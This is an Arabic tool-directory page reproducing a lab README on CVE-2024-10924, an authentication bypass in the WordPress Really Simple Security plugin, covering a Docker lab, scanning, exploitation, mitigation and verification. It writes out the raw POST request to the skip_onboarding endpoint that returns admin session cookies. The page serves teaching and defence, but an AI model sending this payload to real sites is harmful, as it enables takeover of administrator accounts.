Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-10924 — يوضح استغلال وتخفيف CVE-2024-10924، وهو تجاوز مصادقة في WordPress Really Simple Security، مع استغلال Python آلي وخطوات Burp Suite يدوية والتحقق من التصحيح. | Kitploit
أدوات/GitHubGitHub/bodoinon/cve-2024-10924
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالمصادقةالتعلم والتعليم
GitHubbodoinon/cve-2024-10924

CVE-2024-10924

يوضح استغلال وتخفيف CVE-2024-10924، وهو تجاوز مصادقة في WordPress Really Simple Security، مع استغلال Python آلي وخطوات Burp Suite يدوية والتحقق من التصحيح.

عرض المستودع
2منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-10924 - تجاوز المصادقة في Really Simple Security

نظرة عامة يعرض هذا المشروع استغلال وتخفيف تأثير CVE-2024-10924، وهي ثغرة حرجة في تجاوز المصادقة في إضافة WordPress "Really Simple Security".

الخطوة 1: إعداد البيئة

ابدأ بيئة WordPress المستضعفة: cd wordpress-really-simple-security-authn-bypass-vulnerable-application docker-compose up -d

تحقق من أن الحاويات قيد التشغيل: docker ps

الوصول إلى WordPress: http://localhost:1337

الأدوات المطلوبة:

  • Python 3.x (للاستغلال الآلي)
  • Burp Suite (للاستغلال اليدوي)
  • GVM (Greenbone Vulnerability Management) للفحص

الخطوة 2: فحص الثغرات

قم بتشغيل فحص GVM ضد الهدف:

  • الهدف: http://localhost:1337
  • النتيجة المتوقعة: تم اكتشاف CVE-2024-10924
  • الخطورة: حرجة (CVSS 9.8)
  • نقطة النهاية المستضعفة: /reallysimplessl/v1/two_fa/skip_onboarding

الخطوة 3: الاستغلال

الطريقة أ - استغلال بايثون الآلي: python exploit.py

الطريقة ب - بورب سويت اليدوي:

  1. اعترض حركة المرور إلى http://localhost:1337

  2. أرسل طلب POST: POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1 Host: localhost:1337 Content-Type: application/json

    {"user_id": 1, "login_nonce": "hack", "redirect_to": "/wp-admin/"}

  3. لاحظ الاستجابة مع ترويسة Set-Cookie التي تحتوي على جلسة المسؤول

النتيجة المتوقعة:

  • الحالة: 200 OK
  • تم إرجاع ملفات تعريف ارتباط جلسة المسؤول
  • تجاوز ناجح دون بيانات اعتماد

الخطوة 4: التخفيف

طبّق التصحيح لحظر نقطة النهاية المستضعفة: .\patch.ps1

ماذا يفعل هذا:

  • ينسخ mitigation.php إلى /wp-content/mu-plugins/ في الحاوية
  • يحظر جميع الطلبات إلى نقطة نهاية REST API المستضعفة
  • يُرجع 403 Forbidden لمحاولات الاستغلال
  • الخطوة 5: التحقق

    أعد تشغيل الاستغلال (الطريقة أ أو ب): python exploit.py

    النتيجة المتوقعة بعد التخفيف:

    • الحالة: 403 Forbidden
    • لا يتم إرجاع ملفات تعريف ارتباط المسؤول
    • تم حظر الهجوم بنجاح

    ملاحظات إضافية

    لإيقاف البيئة: docker-compose down

    لعرض سجلات الحاوية: docker-compose logs -f

    للوصول إلى لوحة تحكم WordPress بشكل شرعي: http://localhost:1337/wp-admin (تحقق من docker-compose.yml لمعرفة بيانات الاعتماد)

    تنزيل الأداة